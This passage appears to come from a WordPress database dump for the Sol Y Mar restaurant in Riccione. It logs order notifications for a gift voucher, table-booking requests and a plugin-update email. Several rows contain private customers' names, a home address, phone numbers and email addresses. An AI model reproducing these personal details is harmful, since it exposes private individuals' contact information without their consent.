1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left; border-top-width: 4px;\"><span class=\"woocommerce-Price-amount amount\">100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Metodo di pagamento:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">PayPal</td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Totale:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\"><span class=\"woocommerce-Price-amount amount\">100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n							</tfoot>\n	</table>\n</div>\n\n\n<table id=\"addresses\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" style=\"width: 100%; vertical-align: top; margin-bottom: 40px; padding: 0;\">\n	<tr>\n		<td valign=\"top\" width=\"50%\" style=\"text-align: left; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif; border: 0; padding: 0;\">\n			<h2 style=\'color: #557da1; display: block; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 18px; font-weight: bold; line-height: 130%; margin: 0 0 18px; text-align: left;\'>Indirizzo di fatturazione</h2>\n\n			<address class=\"address\" style=\"padding: 12px; color: #737373; border: 1px solid #e4e4e4;\">\n				Marcello Manduchi<br>Torricelli 14<br>47030<br>San Mauro Pascoli<br>FORLÌ-CESENA									<br><a href=\"tel:3204217844\" style=\"color: #557da1; font-weight: normal; text-decoration: underline;\">3204217844</a>													<br>marcello.manduchi@hotmail.it							</address>\n		</td>\n			</tr>\n</table>\n<p style=\"margin: 0 0 16px;\">Congratulazioni per la vendita.</p>\n															</div>\n														</td>\n													</tr>\n												</table>\n												<!-- End Content -->\n											</td>\n										</tr>\n									</table>\n									<!-- End Body -->\n								</td>\n							</tr>\n						</table>\n					</td>\n				</tr>\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<!-- Footer -->\n						<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"600\" id=\"template_footer\">\n							<tr>\n								<td valign=\"top\" style=\"padding: 0; border-radius: 6px;\">\n									<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"100%\">\n										<tr>\n											<td colspan=\"2\" valign=\"middle\" id=\"credit\" style=\'border-radius: 6px; border: 0; color: #969696; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 12px; line-height: 150%; text-align: center; padding: 24px 0;\'>\n												<p style=\"margin: 0 0 16px;\">Sol Y Mar, ristorante a Riccione</p>\n											</td>\n										</tr>\n									</table>\n								</td>\n							</tr>\n						</table>\n						<!-- End Footer -->\n					</td>\n				</tr>\n			</table>\n		</div>\n	</body>\n</html>\n','[Sol Y Mar, ristorante a Riccione] Prenotazione da nuovo cliente (1141) - 25 Ottobre 2020','Sent ( ** Fallback ** )','private','closed','closed','','sol-y-mar-ristorante-a-riccione-prenotazione-da-nuovo-cliente-1141-25-ottobre-2020-3','','','2020-10-26 09:53:00','2020-10-26 08:53:00','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-ristorante-a-riccione-prenotazione-da-nuovo-cliente-1141-25-ottobre-2020-3/',0,'postman_sent_mail','',0),(1165,1,'2020-10-26 09:53:50','2020-10-26 08:53:50','Da: Lara Guccini <laraguccini@yahoo.it>\nTelefono: 3803334875\nOggetto: Regalo coupon per cena 100 euro\n\nCorpo del messaggio:\nHo provato diverse volte all’acquisto di un buono cena ma non mi viene consentito di procedere al pagamento (Explorer, chrome), potete aiutarmi? Potrei fare bonifico? Grazie Lara\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)','Da sito Sol Y Mar: \"Regalo coupon per cena 100 euro\"','Incorrect authentication data\r\n','private','closed','closed','','da-sito-sol-y-mar-regalo-coupon-per-cena-100-euro-2','','','2020-10-26 09:53:50','2020-10-26 08:53:50','',0,'https://www.ristorantesolymar.it/postman_sent_mail/da-sito-sol-y-mar-regalo-coupon-per-cena-100-euro-2/',0,'postman_sent_mail','',0),(1166,1,'2020-10-26 09:53:50','2020-10-26 08:53:50','Da: Lara Guccini <laraguccini@yahoo.it>\nTelefono: 3803334875\nOggetto: Regalo coupon per cena 100 euro\n\nCorpo del messaggio:\nHo provato diverse volte all’acquisto di un buono cena ma non mi viene consentito di procedere al pagamento (Explorer, chrome), potete aiutarmi? Potrei fare bonifico? Grazie Lara\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)','Da sito Sol Y Mar: \"Regalo coupon per cena 100 euro\"','Sent ( ** Fallback ** )','private','closed','closed','','da-sito-sol-y-mar-regalo-coupon-per-cena-100-euro-3','','','2020-10-26 09:53:50','2020-10-26 08:53:50','',0,'https://www.ristorantesolymar.it/postman_sent_mail/da-sito-sol-y-mar-regalo-coupon-per-cena-100-euro-3/',0,'postman_sent_mail','',0),(1167,1,'2020-10-26 09:54:05','2020-10-26 08:54:05','<!DOCTYPE html>\n<html lang=\"it-IT\">\n	<head>\n		<meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\">\n		<title>Sol Y Mar, ristorante a Riccione</title>\n	</head>\n	<body leftmargin=\"0\" marginwidth=\"0\" topmargin=\"0\" marginheight=\"0\" offset=\"0\" style=\"padding: 0;\">\n		<div id=\"wrapper\" dir=\"ltr\" style=\"background-color: #f5f5f5; margin: 0; padding: 70px 0; width: 100%; -webkit-text-size-adjust: none;\">\n			<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" height=\"100%\" width=\"100%\">\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<div id=\"template_header_image\">\n													</div>\n						<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_container\" style=\"background-color: #fdfdfd; border: 1px solid #dcdcdc; box-shadow: 0 1px 4px rgba(0, 0, 0, 0.1); border-radius: 3px;\">\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Header -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"template_header\" style=\'background-color: #557da1; color: #ffffff; border-bottom: 0; font-weight: bold; line-height: 100%; vertical-align: middle; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; border-radius: 3px 3px 0 0;\'>\n										<tr>\n											<td id=\"header_wrapper\" style=\"padding: 36px 48px; display: block;\">\n												<h1 style=\'font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 30px; font-weight: 300; line-height: 150%; margin: 0; text-align: left; text-shadow: 0 1px 0 #7797b4; color: #ffffff; background-color: inherit;\'>Nuova prenotazione cliente</h1>\n											</td>\n										</tr>\n									</table>\n									<!-- End Header -->\n								</td>\n							</tr>\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Body -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_body\">\n										<tr>\n											<td valign=\"top\" id=\"body_content\" style=\"background-color: #fdfdfd;\">\n												<!-- Content -->\n												<table border=\"0\" cellpadding=\"20\" cellspacing=\"0\" width=\"100%\">\n													<tr>\n														<td valign=\"top\" style=\"padding: 48px 48px 32px;\">\n															<div id=\"body_content_inner\" style=\'color: #737373; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 14px; line-height: 150%; text-align: left;\'>\n\n<p style=\"margin: 0 0 16px;\">Hai ricevuto il seguente ordine da Marcello Manduchi:</p>\n\n<h2 style=\'color: #557da1; display: block; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 18px; font-weight: bold; line-height: 130%; margin: 0 0 18px; text-align: left;\'>\n	<a class=\"link\" href=\"https://www.ristorantesolymar.it/wp-admin/post.php?post=1141&amp;action=edit\" style=\"font-weight: normal; text-decoration: underline; color: #557da1;\">[Ordine #1141]</a> (25 Ottobre 2020)</h2>\n\n<div style=\"margin-bottom: 40px;\">\n	<table class=\"td\" cellspacing=\"0\" cellpadding=\"6\" border=\"1\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; width: 100%; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n		<thead>\n			<tr>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Prodotto</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Quantità</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Prezzo</th>\n			</tr>\n		</thead>\n		<tbody>\n				<tr class=\"order_item\">\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif; word-wrap: break-word;\">\n		Buono Regalo (valore a scelta) (#coupon)<ul class=\"wc-item-meta\" style=\"font-size: small; margin: 1em 0 0; padding: 0; list-style: none;\">\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">To Name:</strong> <p style=\"margin: 0;\">Filippo Saulle</p>\n</li>\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">To:</strong> <p style=\"margin: 0;\"><a href=\"mailto:Filos4@libero.it\" style=\"color: #557da1; font-weight: normal; text-decoration: underline;\">Filos4@libero.it</a></p>\n</li>\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">From:</strong> <p style=\"margin: 0;\">Amalia e Riccardo Manduchi</p>\n</li>\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">Message:</strong> <p style=\"margin: 0;\">Ti doniamo un piccolo momento di piacere, per ringraziarti del tempo e delle cure che ci hai dedicato in questi mesi. Grazie zio!</p>\n</li>\n</ul>		</td>\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n			1		</td>\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n			<span class=\"woocommerce-Price-amount amount\">100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span>		</td>\n	</tr>\n	\n		</tbody>\n		<tfoot>\n								<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left; border-top-width: 4px;\">Subtotale:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left; border-top-width: 4px;\"><span class=\"woocommerce-Price-amount amount\">100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Metodo di pagamento:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">PayPal</td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Totale:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\"><span class=\"woocommerce-Price-amount amount\">100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n							</tfoot>\n	</table>\n</div>\n\n\n<table id=\"addresses\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" style=\"width: 100%; vertical-align: top; margin-bottom: 40px; padding: 0;\">\n	<tr>\n		<td valign=\"top\" width=\"50%\" style=\"text-align: left; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif; border: 0; padding: 0;\">\n			<h2 style=\'color: #557da1; display: block; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 18px; font-weight: bold; line-height: 130%; margin: 0 0 18px; text-align: left;\'>Indirizzo di fatturazione</h2>\n\n			<address class=\"address\" style=\"padding: 12px; color: #737373; border: 1px solid #e4e4e4;\">\n				Marcello Manduchi<br>Torricelli 14<br>47030<br>San Mauro Pascoli<br>FORLÌ-CESENA									<br><a href=\"tel:3204217844\" style=\"color: #557da1; font-weight: normal; text-decoration: underline;\">3204217844</a>													<br>marcello.manduchi@hotmail.it							</address>\n		</td>\n			</tr>\n</table>\n<p style=\"margin: 0 0 16px;\">Congratulazioni per la vendita.</p>\n															</div>\n														</td>\n													</tr>\n												</table>\n												<!-- End Content -->\n											</td>\n										</tr>\n									</table>\n									<!-- End Body -->\n								</td>\n							</tr>\n						</table>\n					</td>\n				</tr>\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<!-- Footer -->\n						<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"600\" id=\"template_footer\">\n							<tr>\n								<td valign=\"top\" style=\"padding: 0; border-radius: 6px;\">\n									<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"100%\">\n										<tr>\n											<td colspan=\"2\" valign=\"middle\" id=\"credit\" style=\'border-radius: 6px; border: 0; color: #969696; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 12px; line-height: 150%; text-align: center; padding: 24px 0;\'>\n												<p style=\"margin: 0 0 16px;\">Sol Y Mar, ristorante a Riccione</p>\n											</td>\n										</tr>\n									</table>\n								</td>\n							</tr>\n						</table>\n						<!-- End Footer -->\n					</td>\n				</tr>\n			</table>\n		</div>\n	</body>\n</html>\n','[Sol Y Mar, ristorante a Riccione] Prenotazione da nuovo cliente (1141) - 25 Ottobre 2020','Incorrect authentication data\r\n','private','closed','closed','','sol-y-mar-ristorante-a-riccione-prenotazione-da-nuovo-cliente-1141-25-ottobre-2020-4','','','2020-10-26 09:54:05','2020-10-26 08:54:05','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-ristorante-a-riccione-prenotazione-da-nuovo-cliente-1141-25-ottobre-2020-4/',0,'postman_sent_mail','',0),(1168,1,'2020-10-26 09:54:05','2020-10-26 08:54:05','<!DOCTYPE html>\n<html lang=\"it-IT\">\n	<head>\n		<meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\">\n		<title>Sol Y Mar, ristorante a Riccione</title>\n	</head>\n	<body leftmargin=\"0\" marginwidth=\"0\" topmargin=\"0\" marginheight=\"0\" offset=\"0\" style=\"padding: 0;\">\n		<div id=\"wrapper\" dir=\"ltr\" style=\"background-color: #f5f5f5; margin: 0; padding: 70px 0; width: 100%; -webkit-text-size-adjust: none;\">\n			<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" height=\"100%\" width=\"100%\">\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<div id=\"template_header_image\">\n													</div>\n						<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_container\" style=\"background-color: #fdfdfd; border: 1px solid #dcdcdc; box-shadow: 0 1px 4px rgba(0, 0, 0, 0.1); border-radius: 3px;\">\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Header -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"template_header\" style=\'background-color: #557da1; color: #ffffff; border-bottom: 0; font-weight: bold; line-height: 100%; vertical-align: middle; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; border-radius: 3px 3px 0 0;\'>\n										<tr>\n											<td id=\"header_wrapper\" style=\"padding: 36px 48px; display: block;\">\n												<h1 style=\'font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 30px; font-weight: 300; line-height: 150%; margin: 0; text-align: left; text-shadow: 0 1px 0 #7797b4; color: #ffffff; background-color: inherit;\'>Nuova prenotazione cliente</h1>\n											</td>\n										</tr>\n									</table>\n									<!-- End Header -->\n								</td>\n							</tr>\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Body -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_body\">\n										<tr>\n											<td valign=\"top\" id=\"body_content\" style=\"background-color: #fdfdfd;\">\n												<!-- Content -->\n												<table border=\"0\" cellpadding=\"20\" cellspacing=\"0\" width=\"100%\">\n													<tr>\n														<td valign=\"top\" style=\"padding: 48px 48px 32px;\">\n															<div id=\"body_content_inner\" style=\'color: #737373; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 14px; line-height: 150%; text-align: left;\'>\n\n<p style=\"margin: 0 0 16px;\">Hai ricevuto il seguente ordine da Marcello Manduchi:</p>\n\n<h2 style=\'color: #557da1; display: block; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 18px; font-weight: bold; line-height: 130%; margin: 0 0 18px; text-align: left;\'>\n	<a class=\"link\" href=\"https://www.ristorantesolymar.it/wp-admin/post.php?post=1141&amp;action=edit\" style=\"font-weight: normal; text-decoration: underline; color: #557da1;\">[Ordine #1141]</a> (25 Ottobre 2020)</h2>\n\n<div style=\"margin-bottom: 40px;\">\n	<table class=\"td\" cellspacing=\"0\" cellpadding=\"6\" border=\"1\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; width: 100%; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n		<thead>\n			<tr>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Prodotto</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Quantità</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Prezzo</th>\n			</tr>\n		</thead>\n		<tbody>\n				<tr class=\"order_item\">\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif; word-wrap: break-word;\">\n		Buono Regalo (valore a scelta) (#coupon)<ul class=\"wc-item-meta\" style=\"font-size: small; margin: 1em 0 0; padding: 0; list-style: none;\">\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">To Name:</strong> <p style=\"margin: 0;\">Filippo Saulle</p>\n</li>\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">To:</strong> <p style=\"margin: 0;\"><a href=\"mailto:Filos4@libero.it\" style=\"color: #557da1; font-weight: normal; text-decoration: underline;\">Filos4@libero.it</a></p>\n</li>\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">From:</strong> <p style=\"margin: 0;\">Amalia e Riccardo Manduchi</p>\n</li>\n<li style=\"margin: 0.5em 0 0; padding: 0;\">\n<strong class=\"wc-item-meta-label\" style=\"float: left; margin-right: .25em; clear: both;\">Message:</strong> <p style=\"margin: 0;\">Ti doniamo un piccolo momento di piacere, per ringraziarti del tempo e delle cure che ci hai dedicato in questi mesi. Grazie zio!</p>\n</li>\n</ul>		</td>\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n			1		</td>\n		<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">\n			<span class=\"woocommerce-Price-amount amount\">100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span>		</td>\n	</tr>\n	\n		</tbody>\n		<tfoot>\n								<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left; border-top-width: 4px;\">Subtotale:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left; border-top-width: 4px;\"><span class=\"woocommerce-Price-amount amount\">100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Metodo di pagamento:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">PayPal</td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Totale:</th>\n						<td class=\"td\" style=\"color: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: left;\"><span class=\"woocommerce-Price-amount amount\">100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n							</tfoot>\n	</table>\n</div>\n\n\n<table id=\"addresses\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" style=\"width: 100%; vertical-align: top; margin-bottom: 40px; padding: 0;\">\n	<tr>\n		<td valign=\"top\" width=\"50%\" style=\"text-align: left; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif; border: 0; padding: 0;\">\n			<h2 style=\'color: #557da1; display: block; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 18px; font-weight: bold; line-height: 130%; margin: 0 0 18px; text-align: left;\'>Indirizzo di fatturazione</h2>\n\n			<address class=\"address\" style=\"padding: 12px; color: #737373; border: 1px solid #e4e4e4;\">\n				Marcello Manduchi<br>Torricelli 14<br>47030<br>San Mauro Pascoli<br>FORLÌ-CESENA									<br><a href=\"tel:3204217844\" style=\"color: #557da1; font-weight: normal; text-decoration: underline;\">3204217844</a>													<br>marcello.manduchi@hotmail.it							</address>\n		</td>\n			</tr>\n</table>\n<p style=\"margin: 0 0 16px;\">Congratulazioni per la vendita.</p>\n															</div>\n														</td>\n													</tr>\n												</table>\n												<!-- End Content -->\n											</td>\n										</tr>\n									</table>\n									<!-- End Body -->\n								</td>\n							</tr>\n						</table>\n					</td>\n				</tr>\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<!-- Footer -->\n						<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"600\" id=\"template_footer\">\n							<tr>\n								<td valign=\"top\" style=\"padding: 0; border-radius: 6px;\">\n									<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"100%\">\n										<tr>\n											<td colspan=\"2\" valign=\"middle\" id=\"credit\" style=\'border-radius: 6px; border: 0; color: #969696; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 12px; line-height: 150%; text-align: center; padding: 24px 0;\'>\n												<p style=\"margin: 0 0 16px;\">Sol Y Mar, ristorante a Riccione</p>\n											</td>\n										</tr>\n									</table>\n								</td>\n							</tr>\n						</table>\n						<!-- End Footer -->\n					</td>\n				</tr>\n			</table>\n		</div>\n	</body>\n</html>\n','[Sol Y Mar, ristorante a Riccione] Prenotazione da nuovo cliente (1141) - 25 Ottobre 2020','Sent ( ** Fallback ** )','private','closed','closed','','sol-y-mar-ristorante-a-riccione-prenotazione-da-nuovo-cliente-1141-25-ottobre-2020-5','','','2020-10-26 09:54:05','2020-10-26 08:54:05','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-ristorante-a-riccione-prenotazione-da-nuovo-cliente-1141-25-ottobre-2020-5/',0,'postman_sent_mail','',0),(1169,0,'2020-10-26 17:06:00','2020-10-26 16:06:00','Da: Salomoni Massimo \nTelefono: 3383339984\nOggetto: prenotazione\n\nCorpo del messaggio:\nBuonasera \r\nvorrei prenotare un tavolo per due persone a pranzo domenica 01/11 alle ore 13 \r\npreferibilmente vista mare..\r\nDistinti Saluti\r\nMassimo\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)','Da sito Sol Y Mar: \"prenotazione\"','Incorrect authentication data\r\n','private','closed','closed','','da-sito-sol-y-mar-prenotazione-15','','','2020-10-26 17:06:00','2020-10-26 16:06:00','',0,'https://www.ristorantesolymar.it/postman_sent_mail/da-sito-sol-y-mar-prenotazione-15/',0,'postman_sent_mail','',0),(1170,0,'2020-10-26 17:06:00','2020-10-26 16:06:00','Da: Salomoni Massimo \nTelefono: 3383339984\nOggetto: prenotazione\n\nCorpo del messaggio:\nBuonasera \r\nvorrei prenotare un tavolo per due persone a pranzo domenica 01/11 alle ore 13 \r\npreferibilmente vista mare..\r\nDistinti Saluti\r\nMassimo\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)','Da sito Sol Y Mar: \"prenotazione\"','Sent ( ** Fallback ** )','private','closed','closed','','da-sito-sol-y-mar-prenotazione-16','','','2020-10-26 17:06:00','2020-10-26 16:06:00','',0,'https://www.ristorantesolymar.it/postman_sent_mail/da-sito-sol-y-mar-prenotazione-16/',0,'postman_sent_mail','',0),(1171,0,'2020-10-27 13:32:17','2020-10-27 12:32:17','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Yoast SEO version 15.2\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','Incorrect authentication data\r\n','private','closed','closed','','sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated','','','2020-10-27 13:32:17','2020-10-27 12:32:17','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated/',0,'postman_sent_mail','',0),(1172,0,'2020-10-27 13:32:17','2020-10-27 12:32:17','{{unknown}}','','','publish','closed','closed','','03274f9d7318c8bff83a5ea7da31c592','','','2020-10-27 13:32:17','2020-10-27 12:32:17','',0,'https://www.ristorantesolymar.it/2020/10/27/03274f9d7318c8bff83a5ea7da31c592/',0,'oembed_cache','',0),(1173,0,'2020-10-27 13:32:17','2020-10-27 12:32:17','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Yoast SEO version 15.2\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','Sent ( ** Fallback ** )','private','closed','closed','','sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-2','','','2020-10-27 13:32:17','2020-10-27 12:32:17','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-2/',0,'postman_sent_mail','',0),(1174,2,'2020-10-29 13:16:40','2020-10-29 12:16:40','','solymar giugno2020 - 0076 (1)','','inherit','open','closed','','solymar-giugno2020-0076-1','','','2020-10-29 13:16:40','2020-10-29 12:16:40','',141,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0076-1.jpg',0,'attachment','image/jpeg',0),(1175,2,'2020-10-29 13:29:28','2020-10-29 12:29:28','<h2>La location</h2>\n[gallery size=\"medium\" link=\"file\" columns=\"2\" ids=\"67,135,137,138\"]\n<h2>I piatti</h2>\n[gallery link=\"file\" ids=\"146,143,145,144,142,136,147,134,1181,1180,1179,1178,1177,1174,1176,1182\"]','Gallery','','inherit','closed','closed','','141-autosave-v1','','','2020-10-29 13:29:28','2020-10-29 12:29:28','',141,'https://www.ristorantesolymar.it/2020/10/29/141-autosave-v1/',0,'revision','',0),(1176,2,'2020-10-29 13:25:20','2020-10-29 12:25:20','','solymar giugno2020 - 0139','','inherit','open','closed','','solymar-giugno2020-0139','','','2020-10-29 13:25:20','2020-10-29 12:25:20','',141,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0139.jpg',0,'attachment','image/jpeg',0),(1177,2,'2020-10-29 13:25:33','2020-10-29 12:25:33','','solymar giugno2020 - 0126','','inherit','open','closed','','solymar-giugno2020-0126','','','2020-10-29 13:25:33','2020-10-29 